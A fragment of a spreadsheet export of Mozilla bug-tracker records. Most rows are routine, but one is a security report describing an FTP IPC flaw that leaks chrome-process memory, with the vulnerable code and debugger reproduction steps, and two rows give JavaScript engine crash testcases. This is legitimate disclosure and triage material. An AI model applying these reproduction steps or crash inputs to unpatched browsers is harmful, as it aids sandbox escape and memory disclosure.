          <t>Build &amp; Test</t>
        </is>
      </c>
      <c r="K1852" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1852" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1852" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N1852" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1852" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1852" t="inlineStr">
        <is>
          <t>[MobileCore][Photon]</t>
        </is>
      </c>
      <c r="Q1852" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1852" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1852" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1852" t="n">
        <v>1</v>
      </c>
      <c r="U1852" t="n">
        <v>0</v>
      </c>
      <c r="V1852" t="n">
        <v>4</v>
      </c>
      <c r="W1852" t="inlineStr">
        <is>
          <t>The progress indicator that got merged as part of Bug 1393310 seem to persist after the website is loaded.  After the website is fully loaded, the element hierarchy shows following:
ProgressIndicator, 0x600000394f90, traits: 8589935104, {{0.0, 64.5}, {375.0, 23.0}}, label: 'Progress', value: 0%
This element should either disappear, or value should be set to 100%.</t>
        </is>
      </c>
      <c r="X1852" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1853">
      <c r="A1853" t="n">
        <v>1415508</v>
      </c>
      <c r="B1853" t="inlineStr">
        <is>
          <t>2017-11-08 03:33:55 -0800</t>
        </is>
      </c>
      <c r="C1853" t="inlineStr">
        <is>
          <t>FTPChannelParent::RecvDivertOnDataAvailable - Chrome Process Info Leak</t>
        </is>
      </c>
      <c r="D1853" t="inlineStr">
        <is>
          <t>2024-02-08 20:07:50 -0800</t>
        </is>
      </c>
      <c r="E1853" t="n">
        <v>1</v>
      </c>
      <c r="F1853" t="n">
        <v>1</v>
      </c>
      <c r="G1853" t="n">
        <v>6</v>
      </c>
      <c r="H1853" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1853" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1853" t="inlineStr">
        <is>
          <t>Networking: FTP</t>
        </is>
      </c>
      <c r="K1853" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1853" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1853" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1853" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1853" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1853" t="inlineStr">
        <is>
          <t>[necko-triaged][adv-main66+]</t>
        </is>
      </c>
      <c r="Q1853" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1853" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1853" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T1853" t="n">
        <v>1</v>
      </c>
      <c r="U1853" t="n">
        <v>0</v>
      </c>
      <c r="V1853" t="n">
        <v>14</v>
      </c>
      <c r="W1853" t="inlineStr">
        <is>
          <t>As part of a code review I am conducting for Paul Theriault against the sandbox, the following vulnerability has been discovered.
A compromised content process can initiate an FTP file download which will in turn generate a mozilla::net::PFTPChannelChild object to handle downloading the files contents for rendering in the content process. If the MIME type is not supported for rendering in the content process, the file will be passed over to the Chrome process so the user may elect to either open or download the file. 
When the file is to be passed over to the Chrome process, the child content process will call FTPChannelParent::RecvDivertOnDataAvailable in the parent chrome process via the PFTPChannel IPDL protocol. The child may supply a length value which is greater than the total size of the file to be downloaded via the 'count' parameter.
&gt; mozilla::ipc::IPCResult
&gt; FTPChannelParent::RecvDivertOnDataAvailable(const nsCString&amp; data, // &lt;-- a byte buffer holding the files contents.
&gt;                                             const uint64_t&amp; offset,
&gt;                                             const uint32_t&amp; count) // &lt;-- attacker can supply a count value greater than the size of the above data buffer.
&gt; {
&gt;   if (NS_WARN_IF(!mDivertingFromChild)) {
&gt;     MOZ_ASSERT(mDivertingFromChild,
&gt;                "Cannot RecvDivertOnDataAvailable if diverting is not set!");
&gt;     FailDiversion(NS_ERROR_UNEXPECTED);
&gt;     return IPC_FAIL_NO_REASON(this);
&gt;   }
&gt; 
&gt;   // Drop OnDataAvailables if the parent was canceled already.
&gt;   if (NS_FAILED(mStatus)) {
&gt;     return IPC_OK();
&gt;   }
&gt; 
&gt;   mEventQ-&gt;RunOrEnqueue(new FTPDivertDataAvailableEvent(this, data, offset,
&gt;                                                         count));
&gt;   return IPC_OK();
&gt; }
The FTPDivertDataAvailableEvent event will in turn call FTPChannelParent::DivertOnDataAvailable which will create an new nsIInputStream to represent the data buffer to process. This stream can have an arbitrary length value supplied by the attacker. If the length value is greater than the data buffer supplied by the attacker, then the adjacent contents of memory can be read from when OnDataAvailable processes the stream.
&gt; void
&gt; FTPChannelParent::DivertOnDataAvailable(const nsCString&amp; data,
&gt;                                         const uint64_t&amp; offset,
&gt;                                         const uint32_t&amp; count)
&gt; {
&gt;   LOG(("FTPChannelParent::DivertOnDataAvailable [this=%p]\n", this));
&gt; 
&gt;   if (NS_WARN_IF(!mDivertingFromChild)) {
&gt;     MOZ_ASSERT(mDivertingFromChild,
&gt;                "Cannot DivertOnDataAvailable if diverting is not set!");
&gt;     FailDiversion(NS_ERROR_UNEXPECTED);
&gt;     return;
&gt;   }
&gt; 
&gt;   // Drop OnDataAvailables if the parent was canceled already.
&gt;   if (NS_FAILED(mStatus)) {
&gt;     return;
&gt;   }
&gt; 
&gt;   nsCOMPtr&lt;nsIInputStream&gt; stringStream;
&gt;   nsresult rv = NS_NewByteInputStream(getter_AddRefs(stringStream), data.get(), // &lt;-- a pointer to the start or the data bufffer
&gt;                                       count, NS_ASSIGNMENT_DEPEND); // &lt;-- the count value which may be &gt; then the size of the data buffer
&gt;   if (NS_FAILED(rv)) {
&gt;     if (mChannel) {
&gt;       mChannel-&gt;Cancel(rv);
&gt;     }
&gt;     mStatus = rv;
&gt;     return;
&gt;   }
&gt; 
&gt;   AutoEventEnqueuer ensureSerialDispatch(mEventQ);
&gt; 
&gt;   rv = OnDataAvailable(mChannel, nullptr, stringStream, offset, count); // &lt;-- continue to process the data and download it to disk.
&gt; 
&gt;   stringStream-&gt;Close();
&gt;   if (NS_FAILED(rv)) {
&gt;     if (mChannel) {
&gt;       mChannel-&gt;Cancel(rv);
&gt;     }
&gt;     mStatus = rv;
&gt;   }
&gt; }
Firefox's default action is to present the user with a dialog to either open or save the file. However in the background the contents of the file will be downloaded to a temp directory with no user interaction required. For example on a Win10 machine I get a file like "C:\Users\stephen\AppData\Local\Temp\qfamDcQE.zip.part". This location will obviously be different across OS platforms which may effect how easily an attacker can read it back depending on the sandbox implementation for that OS.
If an attacker can read this files contents - 
    * They would need read permission explicitly for this file and then either discover or brute force the 'qfamDcQE' part of the file name.
    * They would need read permissions on the temp directory. Then discovering the file name to read should be trivial as directory enumeration API access should be allowed (e.g FindFirstfile/FindNextFile on Windows).
The attacker can now leak out memory from the Chrome process. This could be leveraged by an attacker to either bypass ASLR for an additional memory corruption based sandbox escape exploit, or to try and leak out sensitive contents from the Chrome process (Perhaps session keys or similar).
To reproduce this issue:
    * Visit ftp://speedtest.tele2.net/ in a content process.
    * Optional: Run a tool like procmon.exe to monitor firefox.exe file access if you want to see the .zip.part file being written.
    * Attach WinDbg to this content process.
    * Break into WinDbg and set a breakpoint via the command "bp xul!mozilla::net::PFTPChannelChild::SendDivertOnDataAvailable". Now continue execution of the process.
    * Click a file to download, for example ftp://speedtest.tele2.net/1KB.zip which is 1024 (0x400) bytes in size.
    * WinDbg will break in SendDivertOnDataAvailable. We now simulate a compromised content process. Using the WinDbg Locals window, edit the count value from 0x400 to something larger like 0x1400. Now press F5 to continue execution.
    * Firefox will display a save/open dialog, you can ignore this.
    * The "XXXXXXXX.zip.part" file will automatically be written to disk in the background by the Chrome process. It will be written to your AppData\Local\Temp\ directory. Inspecting this file will show the file size is 0x1400 and at offset 0x400 (the original file size) are 0x1000 bytes of the Chrome processes memory which was adjacent to the original data buffer from the original FTPChannelParent::RecvDivertOnDataAvailable call.
    * Note: There is a chance the Chrome process will read into unallocated memory and access violate. The attacker would need to perform some form of heap massaging in order to influence the layout of the heap and ensure this doesn't happen and that they leak some thing interesting.</t>
        </is>
      </c>
      <c r="X1853" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1854">
      <c r="A1854" t="n">
        <v>1085620</v>
      </c>
      <c r="B1854" t="inlineStr">
        <is>
          <t>2014-10-20 13:47:43 -0700</t>
        </is>
      </c>
      <c r="C1854" t="inlineStr">
        <is>
          <t>gecko build:  B2G KK Emulator opt</t>
        </is>
      </c>
      <c r="D1854" t="inlineStr">
        <is>
          <t>2015-07-14 03:10:00 -0700</t>
        </is>
      </c>
      <c r="E1854" t="n">
        <v>1</v>
      </c>
      <c r="F1854" t="n">
        <v>1</v>
      </c>
      <c r="G1854" t="n">
        <v>5</v>
      </c>
      <c r="H1854" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1854" t="inlineStr">
        <is>
          <t>Taskcluster</t>
        </is>
      </c>
      <c r="J1854" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1854" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1854" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1854" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1854" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1854" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1854" t="inlineStr"/>
      <c r="Q1854" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1854" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1854" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1854" t="n">
        <v>1</v>
      </c>
      <c r="U1854" t="n">
        <v>0</v>
      </c>
      <c r="V1854" t="n">
        <v>7</v>
      </c>
      <c r="W1854" t="inlineStr">
        <is>
          <t>https://github.com/taskcluster/gecko-images/tree/master/b2g-builder</t>
        </is>
      </c>
      <c r="X1854" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1855">
      <c r="A1855" t="n">
        <v>652704</v>
      </c>
      <c r="B1855" t="inlineStr">
        <is>
          <t>2011-04-25 16:37:23 -0700</t>
        </is>
      </c>
      <c r="C1855" t="inlineStr">
        <is>
          <t>[Rapid Release] Implement redesign mobile/download page to reflect Beta channel and beyond</t>
        </is>
      </c>
      <c r="D1855" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E1855" t="n">
        <v>1</v>
      </c>
      <c r="F1855" t="n">
        <v>1</v>
      </c>
      <c r="G1855" t="n">
        <v>5</v>
      </c>
      <c r="H1855" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1855" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J1855" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1855" t="inlineStr">
        <is>
          <t>Firefox 4</t>
        </is>
      </c>
      <c r="L1855" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1855" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1855" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1855" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1855" t="inlineStr"/>
      <c r="Q1855" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1855" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1855" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1855" t="n">
        <v>1</v>
      </c>
      <c r="U1855" t="n">
        <v>0</v>
      </c>
      <c r="V1855" t="n">
        <v>33</v>
      </c>
      <c r="W1855" t="inlineStr">
        <is>
          <t>-By Beta (5/17) - We'll want to include a link/button to Beta build in Android Market.
-We'll also want to phase out N900 (and user can find that in Firefox.com/m CTA).
-We want to make sure this page is similar and localized in the languages we offer in Firefox mobile.</t>
        </is>
      </c>
      <c r="X1855" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1856">
      <c r="A1856" t="n">
        <v>1546232</v>
      </c>
      <c r="B1856" t="inlineStr">
        <is>
          <t>2019-04-22 16:45:03 -0700</t>
        </is>
      </c>
      <c r="C1856" t="inlineStr">
        <is>
          <t>Assertion failure: shape, at js/src/vm/SelfHosting.cpp:3139</t>
        </is>
      </c>
      <c r="D1856" t="inlineStr">
        <is>
          <t>2019-06-11 14:01:41 -0700</t>
        </is>
      </c>
      <c r="E1856" t="n">
        <v>1</v>
      </c>
      <c r="F1856" t="n">
        <v>1</v>
      </c>
      <c r="G1856" t="n">
        <v>3</v>
      </c>
      <c r="H1856" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1856" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1856" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1856" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1856" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1856" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1856" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1856" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1856" t="inlineStr">
        <is>
          <t>[jsbugmon:]</t>
        </is>
      </c>
      <c r="Q1856" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1856" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1856" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T1856" t="n">
        <v>1</v>
      </c>
      <c r="U1856" t="n">
        <v>0</v>
      </c>
      <c r="V1856" t="n">
        <v>18</v>
      </c>
      <c r="W1856" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision b783cd5203ea (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --enable-debug --enable-optimize, run with --fuzzing-safe --ion-offthread-compile=off --more-compartments):
    var g = newGlobal();
    var ga = g["Int8Array"].from([1, 2, 3]);
    gczeal(14);
    var target = newGlobal({newCompartment: true});
    g.eval(`
      var p = new Promise(() =&gt; {});
      var q = p.then();
      var s = Promise.all([p, q]);
    `);
Backtrace:
    received signal SIGSEGV, Segmentation fault.
    #0  GetUnclonedValue (cx=cx@entry=0x7ffff5f19000, selfHostedObject=..., selfHostedObject@entry=..., id=..., id@entry=..., vp=...) at js/src/vm/SelfHosting.cpp:3139
    #1  0x0000555555cb0a05 in JSRuntime::getUnclonedSelfHostedValue (this=this@entry=0x7ffff5f1b000, cx=cx@entry=0x7ffff5f19000, name=..., vp=vp@entry=...) at js/src/vm/SelfHosting.cpp:3469
    #2  0x0000555555cb0b1c in JSRuntime::getUnclonedSelfHostedFunction (this=0x7ffff5f1b000, cx=0x7ffff5f19000, name=...) at js/src/vm/SelfHosting.cpp:3475
    #3  0x0000555555cc5a44 in JSRuntime::cloneSelfHostedFunctionScript (this=&lt;optimized out&gt;, cx=&lt;optimized out&gt;, name=..., name@entry=..., targetFun=targetFun@entry=...) at js/src/vm/SelfHosting.cpp:3418
    #4  0x0000555555b2be58 in JSFunction::createScriptForLazilyInterpretedFunction (cx=&lt;optimized out&gt;, fun=...) at js/src/vm/JSFunction.cpp:1694
    #5  0x0000555555864930 in JSFunction::getOrCreateScript (cx=&lt;optimized out&gt;, fun=...) at js/src/vm/JSFunction.h:545
    #6  0x00005555558e6972 in js::InternalCallOrConstruct (cx=&lt;optimized out&gt;, cx@entry=0x7ffff5f19000, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:537
    #7  0x00005555558e703d in InternalCall (cx=cx@entry=0x7ffff5f19000, args=...) at js/src/vm/Interpreter.cpp:589
    #8  0x00005555558e71b0 in js::Call (cx=cx@entry=0x7ffff5f19000, fval=..., fval@entry=..., thisv=..., thisv@entry=..., args=..., rval=...) at js/src/vm/Interpreter.cpp:605
    #9  0x0000555555aab816 in js::Call (rval=..., thisv=..., fval=..., cx=0x7ffff5f19000) at js/src/vm/Interpreter.h:84
    #10 JS::ForOfIterator::init (this=this@entry=0x7fffffffb360, iterable=iterable@entry=..., nonIterableBehavior=nonIterableBehavior@entry=JS::ForOfIterator::AllowNonIterable) at js/src/vm/ForOfIterator.cpp:82
    #11 0x00005555559870a8 in CommonStaticAllRace (cx=&lt;optimized out&gt;, cx@entry=0x7ffff5f19000, args=..., mode=mode@entry=IterationMode::All) at js/src/builtin/Promise.cpp:2335
    #12 0x0000555555989b9b in Promise_static_all (cx=cx@entry=0x7ffff5f19000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/builtin/Promise.cpp:2393
    #13 0x00005555558ef719 in CallJSNative (cx=0x7ffff5f19000, native=native@entry=0x555555989b60 &lt;Promise_static_all(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/vm/Interpreter.cpp:442
    #14 0x00005555558e68f9 in js::InternalCallOrConstruct (cx=&lt;optimized out&gt;, cx@entry=0x7ffff5f19000, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:534
    #15 0x00005555558e703d in InternalCall (cx=0x7ffff5f19000, args=...) at js/src/vm/Interpreter.cpp:589
    #16 0x00005555558d81ab in js::CallFromStack (args=..., cx=&lt;optimized out&gt;) at js/src/vm/Interpreter.cpp:593
    #17 Interpret (cx=0x7ffff5f19000, state=...) at js/src/vm/Interpreter.cpp:3079
    #18 0x00005555558e6376 in js::RunScript (cx=0x7ffff5f19000, state=...) at js/src/vm/Interpreter.cpp:422
    #19 0x00005555558e9a94 in js::ExecuteKernel (cx=&lt;optimized out&gt;, script=..., script@entry=..., envChainArg=..., newTargetValue=..., evalInFrame=..., evalInFrame@entry=..., result=0x7fffffffc528) at js/src/vm/Interpreter.cpp:781
    #20 0x0000555555927399 in EvalKernel (cx=&lt;optimized out&gt;, cx@entry=0x7ffff5f19000, v=..., evalType=evalType@entry=INDIRECT_EVAL, caller=..., env=..., pc=pc@entry=0x0, vp=...) at js/src/builtin/Eval.cpp:327
    #21 0x0000555555927c15 in js::IndirectEval (cx=cx@entry=0x7ffff5f19000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/builtin/Eval.cpp:425
    #22 0x00005555558ef719 in CallJSNative (cx=0x7ffff5f19000, native=native@entry=0x555555927b60 &lt;js::IndirectEval(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/vm/Interpreter.cpp:442
    #23 0x00005555558e68f9 in js::InternalCallOrConstruct (cx=&lt;optimized out&gt;, cx@entry=0x7ffff5f19000, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:534
    #24 0x00005555558e703d in InternalCall (cx=cx@entry=0x7ffff5f19000, args=...) at js/src/vm/Interpreter.cpp:589
    #25 0x00005555558e71b0 in js::Call (cx=cx@entry=0x7ffff5f19000, fval=..., fval@entry=..., thisv=..., args=..., rval=...) at js/src/vm/Interpreter.cpp:605
    #26 0x0000555555e75520 in js::ForwardingProxyHandler::call (this=&lt;optimized out&gt;, cx=0x7ffff5f19000, proxy=..., args=...) at js/src/proxy/Wrapper.cpp:162
    #27 0x0000555555e5f293 in js::CrossCompartmentWrapper::call (this=0x555557c3e0a0 &lt;js::CrossCompartmentWrapper::singleton&gt;, cx=&lt;optimized out&gt;, wrapper=..., args=...) at js/src/proxy/CrossCompartmentWrapper.cpp:237
    #28 0x0000555555e6b9f5 in js::Proxy::call (cx=0x7ffff5f19000, proxy=proxy@entry=..., args=...) at js/src/proxy/Proxy.cpp:504
    #29 0x00005555558e6e06 in js::InternalCallOrConstruct (cx=&lt;optimized out&gt;, cx@entry=0x7ffff5f19000, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:508
    #30 0x00005555558e703d in InternalCall (cx=0x7ffff5f19000, args=...) at js/src/vm/Interpreter.cpp:589
    #31 0x00005555558d81ab in js::CallFromStack (args=..., cx=&lt;optimized out&gt;) at js/src/vm/Interpreter.cpp:593
    #32 Interpret (cx=0x7ffff5f19000, state=...) at js/src/vm/Interpreter.cpp:3079
    #33 0x00005555558e6376 in js::RunScript (cx=0x7ffff5f19000, state=...) at js/src/vm/Interpreter.cpp:422
    [...]
    #41 0x000055555582fd15 in Shell (envp=&lt;optimized out&gt;, op=0x7fffffffd980, cx=&lt;optimized out&gt;) at js/src/shell/js.cpp:10754
    #42 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:11369
    rax	0x555557c87340	93825033335616
    rbx	0x555556af961a	93825014928922
    rcx	0x7ffff6c1c2dd	140737333281501
    rdx	0x0	0
    rsi	0x7ffff6eeb770	140737336227696
    rdi	0x7ffff6eea540	140737336223040
    rbp	0x7fffffffaaf0	140737488333552
    rsp	0x7fffffffaa90	140737488333456
    r8	0x7ffff6eeb770	140737336227696
    r9	0x7ffff7fe6cc0	140737354034368
    r10	0x58	88
    r11	0x7ffff6b927a0	140737332717472
    r12	0x7fffffffaac0	140737488333504
    r13	0x7ffff5f19000	140737319636992
    r14	0x7fffffffab60	140737488333664
    r15	0x7fffffffad20	140737488334112
    rip	0x555555ca6fa9 &lt;GetUnclonedValue(JSContext*, js::HandleNativeObject, JS::HandleId, JS::MutableHandleValue)+409&gt;
    =&gt; 0x555555ca6fa9 &lt;GetUnclonedValue(JSContext*, js::HandleNativeObject, JS::HandleId, JS::MutableHandleValue)+409&gt;:	movl   $0x0,0x0
       0x555555ca6fb4 &lt;GetUnclonedValue(JSContext*, js::HandleNativeObject, JS::HandleId, JS::MutableHandleValue)+420&gt;:	ud2
Marking s-s because the test involves gczeal.</t>
        </is>
      </c>
      <c r="X1856" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1857">
      <c r="A1857" t="n">
        <v>712208</v>
      </c>
      <c r="B1857" t="inlineStr">
        <is>
          <t>2011-12-19 19:37:27 -0800</t>
        </is>
      </c>
      <c r="C1857" t="inlineStr">
        <is>
          <t>update binutils on linux machines to 2.22</t>
        </is>
      </c>
      <c r="D1857" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1857" t="n">
        <v>1</v>
      </c>
      <c r="F1857" t="n">
        <v>1</v>
      </c>
      <c r="G1857" t="n">
        <v>5</v>
      </c>
      <c r="H1857" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1857" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1857" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1857" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1857" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1857" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1857" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1857" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1857" t="inlineStr">
        <is>
          <t>[puppet]</t>
        </is>
      </c>
      <c r="Q1857" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1857" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1857" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1857" t="n">
        <v>1</v>
      </c>
      <c r="U1857" t="n">
        <v>0</v>
      </c>
      <c r="V1857" t="n">
        <v>3</v>
      </c>
      <c r="W1857" t="inlineStr">
        <is>
          <t>gold from 2.21 fails to link firefox</t>
        </is>
      </c>
      <c r="X1857" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1858">
      <c r="A1858" t="n">
        <v>714614</v>
      </c>
      <c r="B1858" t="inlineStr">
        <is>
          <t>2012-01-02 05:42:07 -0800</t>
        </is>
      </c>
      <c r="C1858" t="inlineStr">
        <is>
          <t>Assertion failure: self-&gt;nativeContains(cx, *aprop), at jsscope.cpp:1000</t>
        </is>
      </c>
      <c r="D1858" t="inlineStr">
        <is>
          <t>2013-01-14 08:04:11 -0800</t>
        </is>
      </c>
      <c r="E1858" t="n">
        <v>1</v>
      </c>
      <c r="F1858" t="n">
        <v>1</v>
      </c>
      <c r="G1858" t="n">
        <v>3</v>
      </c>
      <c r="H1858" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1858" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1858" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1858" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1858" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1858" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1858" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1858" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1858" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q1858" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1858" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1858" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T1858" t="n">
        <v>1</v>
      </c>
      <c r="U1858" t="n">
        <v>0</v>
      </c>
      <c r="V1858" t="n">
        <v>30</v>
      </c>
      <c r="W1858" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-central revision d98fbf3cbd71 (options -m -a -n):
function testForVarInWith(foo, foo) {
  return eval("with ({}) { for (var x = 0; x &lt; 5; x++); } (function() { return delete x; })");
}
f = testForVarInWith()();</t>
        </is>
      </c>
      <c r="X1858" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1859">
      <c r="A1859" t="n">
        <v>1271444</v>
      </c>
      <c r="B1859" t="inlineStr">
        <is>
          <t>2016-05-09 14:42:06 -0700</t>
        </is>
      </c>
      <c r="C1859" t="inlineStr">
        <is>
          <t>The "open head in new window" button drops the call.</t>
        </is>
      </c>
      <c r="D1859" t="inlineStr">
        <is>
          <t>2016-05-19 02:14:50 -0700</t>
        </is>
      </c>
      <c r="E1859" t="n">
        <v>1</v>
      </c>
      <c r="F1859" t="n">
        <v>1</v>
      </c>
      <c r="G1859" t="n">
        <v>6</v>
      </c>
      <c r="H1859" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1859" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J1859" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K1859" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1859" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1859" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1859" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1859" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1859" t="inlineStr"/>
      <c r="Q1859" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1859" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1859" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1859" t="n">
        <v>1</v>
      </c>
      <c r="U1859" t="n">
        <v>0</v>
      </c>
      <c r="V1859" t="n">
        <v>5</v>
      </c>
      <c r="W1859" t="inlineStr">
        <is>
          <t>In FF 48.0a2 (2016-05-04)...
1. Start an Hello call. Start talking to someone. (I'm not signed in; I don't know if this matters.)
2. Click the icon to the left of the "end call" one, the one that should open the talking head in a new window.
The new window opens but is blank, and my friend reports that I dropped from the call. I cannot rejoin the call until I close the entire tab containing the shared web page.</t>
        </is>
      </c>
      <c r="X1859" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1860">
      <c r="A1860" t="n">
        <v>893519</v>
      </c>
      <c r="B1860" t="inlineStr">
        <is>
          <t>2013-07-13 23:18:55 -0700</t>
        </is>
      </c>
      <c r="C1860" t="inlineStr">
        <is>
          <t>Compartment mismatch with asm module in event listener attribute</t>
        </is>
      </c>
      <c r="D1860" t="inlineStr">
        <is>
          <t>2014-11-19 20:11:44 -0800</t>
        </is>
      </c>
      <c r="E1860" t="n">
        <v>1</v>
      </c>
      <c r="F1860" t="n">
        <v>1</v>
      </c>
      <c r="G1860" t="n">
        <v>3</v>
      </c>
